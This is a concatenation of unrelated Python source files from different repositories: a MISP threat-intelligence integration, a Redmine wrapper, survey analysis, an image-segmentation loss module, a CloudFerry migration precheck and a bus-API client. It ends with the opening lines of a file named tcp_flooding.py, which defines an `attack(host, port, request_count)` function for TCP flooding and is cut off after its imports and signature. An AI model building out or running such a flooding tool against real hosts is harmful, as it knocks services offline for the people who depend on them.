UUID': event.get('UUID'), }) return event_highlights def search_events(demisto_args: dict) -> CommandResults: """ Execute a MISP search using the 'event' controller. """ args = prepare_args_to_search('events') page = arg_to_number(demisto_args.get('page', 1), "page", required=True) limit = arg_to_number(demisto_args.get('limit', 50), "limit", required=True) pagination_args_validation(page, limit) response = PYMISP.search(**args) if response: response_for_context = build_events_search_response(response) event_outputs_to_human_readable = event_to_human_readable(response_for_context) pagination_message = f"Current page size: {limit}\n" if len(response_for_context) == limit: pagination_message += f"Showing page {page} out others that may exist" else: pagination_message += f"Showing page {page}" md = tableToMarkdown( f"MISP search-events returned {len(response_for_context)} events.\n {pagination_message}", event_outputs_to_human_readable, removeNull=True) return CommandResults( raw_response=response, readable_output=md, outputs=response_for_context, outputs_prefix="MISP.Event", outputs_key_field="ID" ) else: return CommandResults(readable_output=f"No events found in MISP for the given filters: {args}") def delete_event(demisto_args: dict): """ Gets an event id and deletes it. 
""" event_id = demisto_args.get('event_id') response = PYMISP.delete_event(event_id) if 'errors' in response: raise DemistoException(f'Event ID: {event_id} has not found in MISP: \nError message: {response}') else: human_readable = f'Event {event_id} has been deleted' return CommandResults(readable_output=human_readable, raw_response=response) def add_tag(demisto_args: dict, is_attribute=False): """ Function will add tag to given UUID of event or attribute. is_attribute (bool): if the given UUID belongs to an attribute (True) or event (False). """ uuid = demisto_args.get('uuid') tag = demisto_args.get('tag') try: PYMISP.tag(uuid, tag) # add the tag except PyMISPError: raise DemistoException("Adding the required tag was failed. Please make sure the UUID exists.") if is_attribute: response = PYMISP.search(uuid=uuid, controller='attributes') human_readable = f'Tag {tag} has been successfully added to attribute {uuid}' return CommandResults( readable_output=human_readable, outputs_prefix='MISP.Attribute', outputs_key_field='ID', outputs=build_attributes_search_response(response), raw_response=response ) # event's uuid response = PYMISP.search(uuid=uuid) human_readable = f'Tag {tag} has been successfully added to event {uuid}' return CommandResults( readable_output=human_readable, outputs_prefix='MISP.Event', outputs_key_field='ID', outputs=build_events_search_response(response), raw_response=response ) def remove_tag(demisto_args: dict, is_attribute=False): """ Function will remove tag to given UUID of event or attribute. is_attribute (bool): if the given UUID is an attribute's one. Otherwise it's event's. """ uuid = demisto_args.get('uuid') tag = demisto_args.get('tag') try: response = PYMISP.untag(uuid, tag) if response and response.get('errors'): raise DemistoException(f'Error in `{demisto.command()}` command: {response}') except PyMISPError: raise DemistoException("Removing the required tag was failed. 
Please make sure the UUID and tag exist.") if is_attribute: response = PYMISP.search(uuid=uuid, controller='attributes') human_readable = f'Tag {tag} has been successfully removed from the attribute {uuid}' return CommandResults( readable_output=human_readable, outputs_prefix='MISP.Attribute', outputs_key_field='ID', outputs=build_attributes_search_response(response), raw_response=response ) # event's uuid response = PYMISP.search(uuid=uuid) human_readable = f'Tag {tag} has been successfully removed from the event {uuid}' return CommandResults( readable_output=human_readable, outputs_prefix='MISP.Event', outputs_key_field='ID', outputs=build_events_search_response(response), raw_response=response ) def add_sighting(demisto_args: dict): """Adds sighting to MISP attribute """ attribute_id = demisto_args.get('id') attribute_uuid = demisto_args.get('uuid') sighting_type = demisto_args['type'] # mandatory arg att_id = attribute_id or attribute_uuid if not att_id: raise DemistoException('ID or UUID not specified') sighting_args = { 'id': attribute_id, 'uuid': attribute_uuid, 'type': SIGHTING_TYPE_NAME_TO_ID[sighting_type] } sigh_obj = MISPSighting() sigh_obj.from_dict(**sighting_args) response = PYMISP.add_sighting(sigh_obj, att_id) if response.get('message'): raise DemistoException(f"An error was occurred: {response.get('message')}") elif response.get('Sighting'): human_readable = f'Sighting \'{sighting_type}\' has been successfully added to attribute {att_id}' return CommandResults(readable_output=human_readable) raise DemistoException(f"An error was occurred: {json.dumps(response)}") def test(malicious_tag_ids, suspicious_tag_ids, attributes_limit): """ Test module. """ is_tag_list_valid(malicious_tag_ids) is_tag_list_valid(suspicious_tag_ids) if attributes_limit < 0: raise DemistoException('Attribute limit has to be a positive number.') response = PYMISP._prepare_request('GET', 'servers/getPyMISPVersion.json') if PYMISP._check_json_response(response): return 'ok' else: raise DemistoException('MISP has not connected.') def build_feed_url(demisto_args): url = demisto_args.get('feed') url = url[:-1] if url.endswith('/') else url if PREDEFINED_FEEDS.get(url): url = PREDEFINED_FEEDS[url].get('url') # type: ignore return url def add_events_from_feed(demisto_args: dict, use_ssl: bool, proxies: dict): """Gets an OSINT feed from url and publishing them to MISP urls with feeds for example: https://www.misp-project.org/feeds/ feed format must be MISP. 
""" headers = {'Accept': 'application/json'} url = build_feed_url(demisto_args) osint_url = f'{url}/manifest.json' limit = arg_to_number(demisto_args.get('limit', 2), "limit", required=True) try: uri_list = requests.get(osint_url, verify=use_ssl, headers=headers, proxies=proxies).json() events_ids = list() # type: List[Dict[str, int]] for index, uri in enumerate(uri_list, 1): response = requests.get(f'{url}/{uri}.json', verify=use_ssl, headers=headers, proxies=proxies).json() misp_new_event = MISPEvent() misp_new_event.load(response) add_event_response = PYMISP.add_event(misp_new_event) event_object = add_event_response.get('Event') if event_object and 'id' in event_object: events_ids.append({'ID': event_object['id']}) if limit == len(events_ids): break human_readable = tableToMarkdown(f'Total of {len(events_ids)} events was added to MISP.', events_ids) return CommandResults( readable_output=human_readable, outputs_prefix='MISP.Event', outputs_key_field='ID', outputs=events_ids, ) except ValueError as e: raise DemistoException(f'URL [{url}] is not a valid MISP feed. error: {e}') def add_object(event_id: str, obj: MISPObject): """Sending object to MISP and returning outputs Args: obj: object to add to MISP event_id: ID of event """ response = PYMISP.add_object(event_id, misp_object=obj) if 'errors' in response: raise DemistoException(f'Error in `{demisto.command()}` command: {response}') for ref in obj.ObjectReference: response = PYMISP.add_object_reference(ref) for attribute in response.get('Object', {}).get('Attribute', []): convert_timestamp_to_readable(attribute, None) response['Object']['timestamp'] = misp_convert_timestamp_to_date_string(response.get('Object', {}).get('timestamp')) formatted_response = replace_keys_from_misp_to_context_data(response) formatted_response.update({"ID": event_id}) human_readable = f'Object has been added to MISP event ID {event_id}' return CommandResults( readable_output=human_readable, outputs_prefix='MISP.Event', outputs_key_field='ID', outputs=formatted_response, ) def add_file_object(demisto_args: dict): entry_id = demisto_args.get('entry_id') event_id = demisto_args.get('event_id') file_path = demisto.getFilePath(entry_id).get('path') obj = FileObject(file_path) return add_object(event_id, obj) def add_domain_object(demisto_args: dict): """Adds a domain object to MISP domain-ip description: https://www.misp-project.org/objects.html#_domain_ip """ text = demisto_args.get('text') event_id = demisto_args.get('event_id') domain = demisto_args.get('name') obj = MISPObject('domain-ip') ips = argToList(demisto_args.get('ip')) for ip in ips: obj.add_attribute('ip', value=ip) obj.add_attribute('domain', value=domain) if text: obj.add_attribute('text', value=text) return add_object(event_id, obj) def add_url_object(demisto_args: dict): """Building url object in MISP scheme Scheme described https://www.misp-project.org/objects.html#_url """ url_args = [ 'text', 'last_seen', 'first_seen' ] event_id = demisto_args.get('event_id') url = demisto_args.get('url') url_parse = urlparse(url) url_obj = [{'url': url}] url_obj.extend({'scheme': url_parse.scheme}) if url_parse.scheme else None url_obj.append({'resource_path': url_parse.path}) if url_parse.path else None url_obj.append({'query_string': url_parse.query}) if url_parse.query else None url_obj.append({'domain': url_parse.netloc}) if url_parse.netloc else None url_obj.append({'fragment': url_parse.fragment}) if url_parse.fragment else None url_obj.append({'port': url_parse.port}) if url_parse.port else None 
url_obj.append( {'credential': (url_parse.username, url_parse.password)}) if url_parse.username and url_parse.password else None url_obj.extend(convert_arg_to_misp_args(demisto_args, url_args)) g_object = build_generic_object('url', url_obj) return add_object(event_id, g_object) def add_generic_object_command(demisto_args: dict): event_id = demisto_args.get('event_id') template = demisto_args.get('template') attributes = demisto_args.get('attributes').replace("'", '"') try: args = json.loads(attributes) if not isinstance(args, list): args = dict_to_generic_object_format(args) obj = build_generic_object(template, args) return add_object(event_id, obj) except ValueError as e: raise DemistoException( f'`attribute` parameter could not be decoded, it may not be valid JSON\nattribute: {attributes}', str(e)) def convert_arg_to_misp_args(demisto_args, args_names): return [{arg.replace('_', '-'): demisto_args.get(arg)} for arg in args_names if demisto_args.get(arg)] def add_ip_object(demisto_args: dict): event_id = demisto_args.get('event_id') ip_object_args = [ 'dst_port', 'src_port', 'domain', 'hostname', 'ip_src', 'ip_dst' ] # converting args to MISP's argument types misp_attributes_args = convert_arg_to_misp_args(demisto_args, ip_object_args) ips = argToList(demisto_args.get('ip')) for ip in ips: misp_attributes_args.append({'ip': ip}) if misp_attributes_args: non_req_args = [ 'first_seen', 'last_seen', ] misp_attributes_args.extend(convert_arg_to_misp_args(demisto_args, non_req_args)) misp_attributes_args.append({'text': demisto_args.get('comment')}) if demisto_args.get('comment') else None obj = build_generic_object('ip-port', misp_attributes_args) return add_object(event_id, obj) else: raise DemistoException( f'None of the required arguments is present. Command {demisto.command()} requires one of {ip_object_args}') def handle_tag_duplication_ids(malicious_tag_ids, suspicious_tag_ids): """ Gets 2 sets which include tag ids. If there is an id that exists in both sets, it will be removed from the suspicious tag ids set and will stay only in the malicious one (as a tag that was configured to be malicious is stronger than one recognised as suspicious). 
""" common_ids = set(malicious_tag_ids) & set(suspicious_tag_ids) suspicious_tag_ids = {tag_id for tag_id in suspicious_tag_ids if tag_id not in common_ids} return malicious_tag_ids, suspicious_tag_ids def is_tag_list_valid(tag_ids): """Gets a list ot tag ids (each one is str), and verify all the tags are valid positive integers.""" for tag in tag_ids: try: tag = int(tag) if tag <= 0: raise DemistoException(f"Tag id has to be a positive integer, please change the given: '{tag}' id.") except ValueError: raise DemistoException(f"Tag id has to be a positive integer, please change the given: '{tag}' id.") def create_updated_attribute_instance(demisto_args: dict, attribute_uuid: str) -> MISPAttribute: attribute_type = demisto_args.get('type') distribution = demisto_args.get('distribution') category = demisto_args.get('category') comment = demisto_args.get('comment') value = demisto_args.get('value') first_seen = demisto_args.get('first_seen') last_seen = demisto_args.get('last_seen') attribute_instance = MISPAttribute() attribute_instance.uuid = attribute_uuid if attribute_type: attribute_instance.type = attribute_type if distribution: attribute_instance.distribution = MISP_DISTRIBUTION_TO_IDS[distribution] if category: attribute_instance.category = category if value: attribute_instance.value = value if comment: attribute_instance.comment = comment if first_seen: attribute_instance.first_seen = first_seen if last_seen: attribute_instance.last_seen = last_seen return attribute_instance def update_attribute_command(demisto_args: dict) -> CommandResults: attribute_uuid = demisto_args.get('attribute_uuid') attribute_instance = create_updated_attribute_instance(demisto_args, attribute_uuid) attribute_instance_response = PYMISP.update_attribute(attribute=attribute_instance, attribute_id=attribute_uuid) if isinstance(attribute_instance_response, dict) and attribute_instance_response.get('errors'): raise DemistoException(attribute_instance_response.get('errors')) human_readable = f"## MISP update attribute\nAttribute: {attribute_uuid} was updated.\n" attribute = attribute_instance_response.get('Attribute') convert_timestamp_to_readable(attribute, None) parsed_attribute_data = replace_keys_from_misp_to_context_data(attribute) return CommandResults( readable_output=human_readable, outputs_prefix='MISP.Attribute', outputs_key_field='ID', outputs=parsed_attribute_data, ) def main(): params = demisto.params() malicious_tag_ids = argToList(params.get('malicious_tag_ids')) suspicious_tag_ids = argToList(params.get('suspicious_tag_ids')) reliability = params.get('integrationReliability', 'B - Usually reliable') if DBotScoreReliability.is_valid_type(reliability): reliability = DBotScoreReliability.get_dbot_score_reliability_from_str(reliability) else: Exception("MISP V3 error: Please provide a valid value for the Source Reliability parameter") attributes_limit = arg_to_number(params.get('attributes_limit', 20), "attributes_limit", required=True) command = demisto.command() demisto.debug(f'[MISP V3]: command is {command}') args = demisto.args() try: malicious_tag_ids, suspicious_tag_ids = handle_tag_duplication_ids(malicious_tag_ids, suspicious_tag_ids) if command == 'test-module': return_results(test(malicious_tag_ids=malicious_tag_ids, suspicious_tag_ids=suspicious_tag_ids, attributes_limit=attributes_limit)) elif command == 'misp-create-event': return_results(create_event_command(args)) elif command == 'misp-add-attribute': return_results(add_attribute(demisto_args=args)) elif command == 'misp-search-events': 
return_results(search_events(args)) elif command == 'misp-search-attributes': return_results(search_attributes(args)) elif command == 'misp-delete-event': return_results(delete_event(args)) elif command == 'misp-add-sighting': return_results(add_sighting(args)) elif command == 'misp-add-tag-to-event': return_results(add_tag(args)) elif command == 'misp-add-tag-to-attribute': return_results(add_tag(demisto_args=args, is_attribute=True)) elif command == 'misp-remove-tag-from-event': return_results(remove_tag(args)) elif command == 'misp-remove-tag-from-attribute': return_results(remove_tag(demisto_args=args, is_attribute=True)) elif command == 'misp-add-events-from-feed': return_results(add_events_from_feed(demisto_args=args, use_ssl=VERIFY, proxies=PROXIES)) elif command == 'file': return_results( generic_reputation_command(args, 'file', 'FILE', malicious_tag_ids, suspicious_tag_ids, reliability, attributes_limit)) elif command == 'url': return_results( generic_reputation_command(args, 'url', 'URL', malicious_tag_ids, suspicious_tag_ids, reliability, attributes_limit)) elif command == 'ip': return_results( generic_reputation_command(args, 'ip', 'IP', malicious_tag_ids, suspicious_tag_ids, reliability, attributes_limit)) elif command == 'domain': return_results( generic_reputation_command(args, 'domain', 'DOMAIN', malicious_tag_ids, suspicious_tag_ids, reliability, attributes_limit)) elif command == 'email': return_results(generic_reputation_command(args, 'email', 'EMAIL', malicious_tag_ids, suspicious_tag_ids, reliability, attributes_limit)) elif command == 'misp-add-file-object': return_results(add_file_object(args)) elif command == 'misp-add-domain-object': return_results(add_domain_object(args)) elif command == 'misp-add-url-object': return_results(add_url_object(args)) elif command == 'misp-add-ip-object': return_results(add_ip_object(args)) elif command == 'misp-add-object': return_results(add_generic_object_command(args)) elif command == 'misp-update-attribute': return_results(update_attribute_command(args)) except PyMISPError as e: return_error(e.message) except Exception as e: return_error(str(e)) if __name__ in ['__main__', '__builtin__', 'builtins']: main()
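A minimal, self-contained sketch of the recursive key-renaming idea used by replace_keys_from_misp_to_context_data above; the two-entry MAPPING here is a hypothetical subset of the real MISP_ENTITIES_TO_CONTEXT_DATA table:

from typing import Union

MAPPING = {'event_id': 'EventID', 'value': 'Value'}  # hypothetical subset of the real mapping

def rename_keys(obj: Union[dict, list, str]) -> Union[dict, list, str]:
    # Recurse through lists and dicts, renaming known keys and keeping unknown ones as-is.
    if isinstance(obj, list):
        return [rename_keys(item) for item in obj]
    if isinstance(obj, dict):
        return {MAPPING.get(key, key): rename_keys(value) for key, value in obj.items()}
    return obj

print(rename_keys({'event_id': '7', 'Attribute': [{'value': '8.8.8.8'}]}))
# -> {'EventID': '7', 'Attribute': [{'Value': '8.8.8.8'}]}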
2.171875
2
redmine/__init__.py
hugoseabra/redmine-task-generator
0
1894
from django.conf import settings from redminelib import Redmine as DefaultRedmine from .validator import RedmineInstanceValidator class Redmine(DefaultRedmine): def __init__(self, url=None, key=None): url = url or settings.REDMINE_BASE_URL key = key or settings.REDMINE_API_KEY super().__init__(url=url, key=key) self.validator = RedmineInstanceValidator(client=self) @property def score_field(self): return self.validator.score_field def instance_errors(self): errors = list() if self.validator.track_errors: errors += self.validator.track_errors if self.validator.score_field_errors: errors += self.validator.score_field_errors return errors def instance_valid(self) -> bool: return self.validator.instance_valid() def project_valid(self, project_id) -> bool: return self.validator.project_valid(project_id)
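A short usage sketch for the Redmine wrapper above, assuming the redminelib package is installed and Django is importable; the URL, API key, and project id are placeholders:

# Hypothetical usage; 'https://redmine.example.com' and 'my-api-key' are placeholders.
from redmine import Redmine

client = Redmine(url='https://redmine.example.com', key='my-api-key')
if not client.instance_valid():
    # Collect tracker and score-field problems reported by the validator.
    for error in client.instance_errors():
        print(error)
elif client.project_valid(project_id=1):
    print('Project 1 is ready for task generation.')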
2.109375
2
python_survey/finished_files/main.py
trenton3983/PyCharmProjects
0
1895
import pandas as pd import numpy as np import matplotlib.pyplot as plt import scipy.stats from finished_files.survey_data_dictionary import DATA_DICTIONARY # Load data # We want to take the names list from our data dictionary names = [x.name for x in DATA_DICTIONARY] # Generate the list of names to import usecols = [x.name for x in DATA_DICTIONARY if x.usecol] # dtypes should be a dict of 'col_name' : dtype dtypes = {x.name : x.dtype for x in DATA_DICTIONARY if x.dtype} # same for converters converters = {x.name : x.converter for x in DATA_DICTIONARY if x.converter} df = pd.read_csv('data/survey.csv', header=0, names=names, dtype=dtypes, converters=converters, usecols=usecols) #%% Clean up data: remove disqualified users # In the survey, any user who selected they don't use Python was then # disqualified from the rest of the survey. So let's drop them here. df = df[df['python_main'] != 'No, I don’t use Python for my current projects'] # Considering we now only have two categories left: # - Yes # - No, I use Python for secondary projects only # Let's turn it into a bool df['python_main'] = df['python_main'] == 'Yes' #%% Plot the web dev / data scientist ratio # In the survey, respondents were asked to estimate the ratio between # the amount of web developers vs the amount of data scientists. Afterwards # they were asked what they thought the most popular answer would be. # Let's see if there's a difference! # This is a categorical data point, and it's already ordered in the data # dictionary. So we shouldn't sort it after counting the values. ratio_self = df['webdev_science_ratio_self'].value_counts(sort=False) ratio_others = df['webdev_science_ratio_others'].value_counts(sort=False) # Let's draw a bar chart comparing the distributions fig = plt.figure() ax = fig.add_subplot(111) RATIO_COUNT = ratio_self.count() x = np.arange(RATIO_COUNT) WIDTH = 0.4 self_bars = ax.bar(x-WIDTH, ratio_self, width=WIDTH, color='b', align='center') others_bars = ax.bar(x, ratio_others, width=WIDTH, color='g', align='center') ax.set_xlabel('Ratios') ax.set_ylabel('Observations') labels = [str(lbl) for lbl in ratio_self.index] ax.set_xticks(x - 0.5 * WIDTH) ax.set_xticklabels(labels) ax.legend((self_bars[0], others_bars[0]), ('Self', 'Most popular')) plt.show() #%% Calculate the predicted totals # Let's recode the ratios to numbers, and calculate the means CONVERSION = { '10:1': 10, '5:1' : 5, '2:1' : 2, '1:1' : 1, '1:2' : 0.5, '1:5' : 0.2, '1:10': 0.1 } self_numeric = df['webdev_science_ratio_self'] \ .replace(CONVERSION.keys(), CONVERSION.values()) others_numeric = df['webdev_science_ratio_others'] \ .replace(CONVERSION.keys(), CONVERSION.values()) print(f'Self:\t\t{self_numeric.mean().round(2)} web devs / scientist') print(f'Others:\t\t{others_numeric.mean().round(2)} web devs / scientist') #%% Is the difference statistically significant? result = scipy.stats.chisquare(ratio_self, ratio_others) # The null hypothesis is that they're the same. Let's see if we can reject it print(result)
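A toy, self-contained illustration of the chi-square comparison used above; the counts are made up, not survey data, and both lists sum to the same total as scipy requires:

import scipy.stats

observed = [120, 80, 50, 30, 20, 10, 5]  # made-up "self" ratio counts
expected = [100, 90, 60, 35, 15, 10, 5]  # made-up "most popular" ratio counts (same total)
result = scipy.stats.chisquare(observed, expected)
print(result.statistic, result.pvalue)  # a small p-value rejects "same distribution"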
3.390625
3
adet/modeling/embedmask/mask_pred.py
yinghdb/AdelaiDet
3
1896
import torch
from torch.nn import functional as F
from torch import nn
from torch.autograd import Variable

from adet.utils.comm import compute_locations, aligned_bilinear


def dice_coefficient(x, target):
    eps = 1e-5
    n_inst = x.size(0)
    x = x.reshape(n_inst, -1)
    target = target.reshape(n_inst, -1)
    intersection = (x * target).sum(dim=1)
    union = (x ** 2.0).sum(dim=1) + (target ** 2.0).sum(dim=1) + eps
    loss = 1. - (2 * intersection / union)
    return loss


def lovasz_grad(gt_sorted):
    """
    Computes gradient of the Lovasz extension w.r.t sorted errors
    See Alg. 1 in paper
    """
    p = len(gt_sorted)
    gts = gt_sorted.sum()
    intersection = gts - gt_sorted.float().cumsum(0)
    union = gts + (1 - gt_sorted.float()).cumsum(0)
    jaccard = 1. - intersection / union
    if p > 1:  # cover 1-pixel case
        jaccard[1:p] = jaccard[1:p] - jaccard[0:-1]
    return jaccard


def lovasz_hinge(logits, labels):
    r"""
    Binary Lovasz hinge loss
    logits: [P] Variable, logits at each prediction (between -\infty and +\infty)
    labels: [P] Tensor, binary ground truth labels (0 or 1)
    """
    if len(labels) == 0:
        # only void pixels, the gradients should be 0
        return logits.sum() * 0.
    signs = 2. * labels.float() - 1.
    errors = (1. - logits * Variable(signs))
    errors_sorted, perm = torch.sort(errors, dim=0, descending=True)
    perm = perm.data
    gt_sorted = labels[perm]
    grad = lovasz_grad(gt_sorted)
    loss = torch.dot(F.relu(errors_sorted), Variable(grad))
    return loss


def lovasz_loss(x, target):
    eps = 1e-6
    n_inst = x.size(0)
    x = x.reshape(n_inst, -1)
    target = target.reshape(n_inst, -1)
    x = torch.clamp(x, min=eps, max=1 - eps)
    x = torch.log(x) - torch.log(1 - x)
    losses = []
    for i in range(n_inst):
        losses.append(lovasz_hinge(x[i], target[i]))
    loss = torch.stack(losses)
    return loss


def build_mask_pred(cfg):
    return MaskPred(cfg)


class MaskPred(nn.Module):
    def __init__(self, cfg):
        super(MaskPred, self).__init__()
        self.in_channels = cfg.MODEL.EMBEDMASK.MASK_BRANCH.OUT_CHANNELS
        self.mask_out_stride = cfg.MODEL.EMBEDMASK.MASK_OUT_STRIDE

        soi = cfg.MODEL.FCOS.SIZES_OF_INTEREST
        self.register_buffer("sizes_of_interest", torch.tensor(soi + [soi[-1] * 2]))
        self.register_buffer("_iter", torch.zeros([1]))

        self.mask_loss_type = cfg.MODEL.EMBEDMASK.MASK_LOSS_TYPE
        self.mask_loss_alpha = cfg.MODEL.EMBEDMASK.MASK_LOSS_ALPHA

    def __call__(self, pixel_embed, mask_feat_stride, pred_instances, gt_instances=None):
        if self.training:
            self._iter += 1

            gt_inds = pred_instances.gt_inds
            gt_bitmasks = torch.cat([per_im.gt_bitmasks for per_im in gt_instances])
            gt_bitmasks = gt_bitmasks[gt_inds].unsqueeze(dim=1).to(dtype=pixel_embed.dtype)

            losses = {}
            if len(pred_instances) == 0:
                dummy_loss = pixel_embed.sum() * 0 + pred_instances.proposal_embed.sum() * 0 + pred_instances.proposal_margin.sum() * 0
                losses["loss_mask"] = dummy_loss
            else:
                mask_prob = self.compute_mask_prob(pred_instances, pixel_embed, mask_feat_stride)
                if self.mask_loss_type == "Dice":
                    mask_losses = dice_coefficient(mask_prob, gt_bitmasks)
                    loss_mask = mask_losses.mean()
                elif self.mask_loss_type == "Lovasz":
                    mask_losses = lovasz_loss(mask_prob, gt_bitmasks)
                    loss_mask = mask_losses.mean()
                losses["loss_mask"] = loss_mask * self.mask_loss_alpha

            return losses
        else:
            if len(pred_instances) > 0:
                mask_prob = self.compute_mask_prob(pred_instances, pixel_embed, mask_feat_stride)
                pred_instances.pred_global_masks = mask_prob

            return pred_instances

    def compute_mask_prob(self, instances, pixel_embed, mask_feat_stride):
        proposal_embed = instances.proposal_embed
        proposal_margin = instances.proposal_margin
        im_inds = instances.im_inds

        dim, m_h, m_w = pixel_embed.shape[-3:]
        obj_num = proposal_embed.shape[0]
        pixel_embed = pixel_embed.permute(0, 2, 3, 1)[im_inds]
        proposal_embed = proposal_embed.view(obj_num, 1, 1, -1).expand(-1, m_h, m_w, -1)
        proposal_margin = proposal_margin.view(obj_num, 1, 1, dim).expand(-1, m_h, m_w, -1)
        mask_var = (pixel_embed - proposal_embed) ** 2
        mask_prob = torch.exp(-torch.sum(mask_var * proposal_margin, dim=3))

        assert mask_feat_stride >= self.mask_out_stride
        assert mask_feat_stride % self.mask_out_stride == 0
        mask_prob = aligned_bilinear(mask_prob.unsqueeze(1), int(mask_feat_stride / self.mask_out_stride))

        return mask_prob
2.234375
2
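A minimal sketch of how the dice_coefficient above behaves on toy tensors may be useful; the input values here are invented for illustration, and only torch plus the function above are assumed:

import torch

# Two hypothetical instances with 4-pixel masks; values are mask probabilities.
pred = torch.tensor([[1., 1., 0., 0.],
                     [1., 0., 0., 0.]])
gt = torch.tensor([[1., 1., 0., 0.],
                   [0., 1., 0., 0.]])

losses = dice_coefficient(pred, gt)
# The first instance matches its target exactly, so its loss is ~0;
# the second has no overlap with its target, so its loss is ~1.
print(losses)  # tensor([0.0000, 1.0000]), up to the eps smoothing term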
cloudferry/actions/prechecks/check_vmax_prerequisites.py
SVilgelm/CloudFerry
6
1897
# Copyright 2016 Mirantis Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
#     http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.

import getpass
import logging

from cloudferry.lib.base import exception
from cloudferry.lib.base.action import action
from cloudferry.lib.utils import local
from cloudferry.lib.utils import remote_runner

LOG = logging.getLogger(__name__)


class CheckVMAXPrerequisites(action.Action):
    """This verifies prerequisites required for NFS to VMAX iSCSI cinder
    volume migration"""

    def _iscsiadm_is_installed_locally(self):
        LOG.info("Checking if iscsiadm tool is installed")
        try:
            local.run('iscsiadm --help &>/dev/null')
        except local.LocalExecutionFailed:
            msg = ("iscsiadm is not available on the local host. Please "
                   "install the iscsiadm tool on the node you are running "
                   "on, or choose another cinder backend for migration. "
                   "iscsiadm is mandatory for migrations with EMC VMAX "
                   "cinder backend")
            LOG.error(msg)
            raise exception.AbortMigrationError(msg)

    def _check_local_sudo_password_set(self):
        current_user = getpass.getuser()
        if current_user != 'root' and \
                self.cfg.migrate.local_sudo_password is None:
            try:
                local.sudo('ls')
            except local.LocalExecutionFailed:
                msg = ("CloudFerry is running as '{user}' user, but "
                       "passwordless sudo does not seem to be configured on "
                       "current host. Please either specify password in "
                       "`local_sudo_password` config option, or run "
                       "CloudFerry as root user.").format(user=current_user)
                LOG.error(msg)
                raise exception.AbortMigrationError(msg)

    def _ssh_connectivity_between_controllers(self):
        src_host = self.cfg.src.ssh_host
        src_user = self.cfg.src.ssh_user
        dst_host = self.cfg.dst.ssh_host
        dst_user = self.cfg.dst.ssh_user

        LOG.info("Checking ssh connectivity between '%s' and '%s'",
                 src_host, dst_host)

        rr = remote_runner.RemoteRunner(src_host, src_user)

        ssh_opts = ('-o UserKnownHostsFile=/dev/null '
                    '-o StrictHostKeyChecking=no')

        cmd = "ssh {opts} {user}@{host} 'echo ok'".format(opts=ssh_opts,
                                                          user=dst_user,
                                                          host=dst_host)

        try:
            rr.run(cmd)
        except remote_runner.RemoteExecutionError:
            msg = ("No ssh connectivity between source host '{src_host}' and "
                   "destination host '{dst_host}'. Make sure you have keys "
                   "and correct configuration on these nodes. To verify run "
                   "'{ssh_cmd}' from '{src_host}' node")
            msg = msg.format(src_host=src_host, dst_host=dst_host, ssh_cmd=cmd)
            LOG.error(msg)
            raise exception.AbortMigrationError(msg)

    def run(self, **kwargs):
        if self.cfg.dst_storage.backend != 'iscsi-vmax':
            return
        self._iscsiadm_is_installed_locally()
        self._ssh_connectivity_between_controllers()
        self._check_local_sudo_password_set()
1.726563
2
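The ssh connectivity check above reduces to running `ssh <dst> 'echo ok'` from the source controller; a standalone sketch of that pattern using only the Python standard library follows. The host and user names are placeholders, and this deliberately bypasses CloudFerry's RemoteRunner, so it illustrates the check rather than the project's actual code path:

import subprocess

# Hypothetical destination; CloudFerry reads these values from cfg.dst.
dst = "cloud@dst.example.com"

cmd = [
    "ssh",
    "-o", "UserKnownHostsFile=/dev/null",
    "-o", "StrictHostKeyChecking=no",
    dst,
    "echo ok",
]

# Run this from the source controller; anything but an "ok" reply means
# the two nodes cannot reach each other over ssh.
result = subprocess.run(cmd, capture_output=True, text=True, timeout=30)
if result.returncode != 0 or result.stdout.strip() != "ok":
    raise RuntimeError("No ssh connectivity between source and destination")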
bongo/core.py
codeforamerica/bongo
0
1898
"""
A simple wrapper for the Bongo Iowa City bus API.
"""

import requests as req


class Bongo(object):
    """
    A simple Python wrapper for the Bongo Iowa City bus API.
    """

    def __init__(self, format='json'):
        self.format = format

    def get(self, endpoint, **kwargs):
        """Perform an HTTP GET request to the API and return the data."""
        if 'format' not in kwargs:
            kwargs['format'] = self.format
        url = "http://ebongo.org/api/%s" % (endpoint)
        response = req.get(url, params=kwargs)
        return self.convert(response)

    def convert(self, response):
        """Convert a request based on the response type."""
        # The header may carry a charset suffix (e.g. "application/json;
        # charset=utf-8"), so check for the media type as a substring.
        content_type = response.headers['content-type']
        if 'application/json' in content_type:
            data = response.json()
        elif 'stoplist' in response.url:
            # The `stoplist` endpoint insists that it's HTML.
            data = response.json()
        else:
            data = response.content
        return data

    def route(self, tag=None, agency=None, **kwargs):
        """
        Get information on a specific route, or all route listings.

        >>> Bongo().route('lantern', 'coralville')
        {"coralville's": {"lantern": "route"}}
        """
        if agency and tag:
            endpoint = 'route'
            kwargs['agency'] = agency
            kwargs['route'] = tag
        else:
            endpoint = 'routelist'
        return self.get(endpoint, **kwargs)

    def routes(self):
        """
        Same as an empty call to the `route` method.

        >>> Bongo().routes()
        {"routes": [1234, 5678, 9999]}
        """
        return self.route()

    def stop(self, number=None, **kwargs):
        """
        Retrieve information specific to a given stop number.

        >>> Bongo().stop(8350)
        {"stop": {"8350": "information"}}
        """
        if number:
            endpoint = 'stop'
            kwargs['stopid'] = number
        else:
            endpoint = 'stoplist'
        return self.get(endpoint, **kwargs)

    def stops(self):
        """
        Same as an empty call to the `stop` method.

        >>> Bongo().stops()
        {"stops": [1234, 5678, 9999]}
        """
        return self.stop()

    def predict(self, number, **kwargs):
        """
        Predict the bus arrival times for a specific stop.

        >>> Bongo().predict(8350)
        {"stop": {"8350": "prediction"}}
        """
        endpoint = 'prediction'
        kwargs['stopid'] = number
        return self.get(endpoint, **kwargs)
3.203125
3
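Since the docstrings above only sketch individual calls, a short combined usage example may help; stop 8350 and the 'lantern'/'coralville' pair come straight from those docstrings, while the actual payloads depend on the live ebongo.org API:

bongo = Bongo()

# Listings, then details and arrival predictions for stop 8350.
stops = bongo.stops()
stop_info = bongo.stop(8350)
arrivals = bongo.predict(8350)

# A specific route needs both a route tag and an agency.
lantern = bongo.route('lantern', agency='coralville')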
src/security/tcp_flooding.py
janaSunrise/useful-python-snippets
1
1899
import random
import socket
import string
import sys
import threading
import time


def attack(host: str, port: int = 80, request_count: int = 10 ** 10) -> None:
    # Threading support
    thread_num = 0
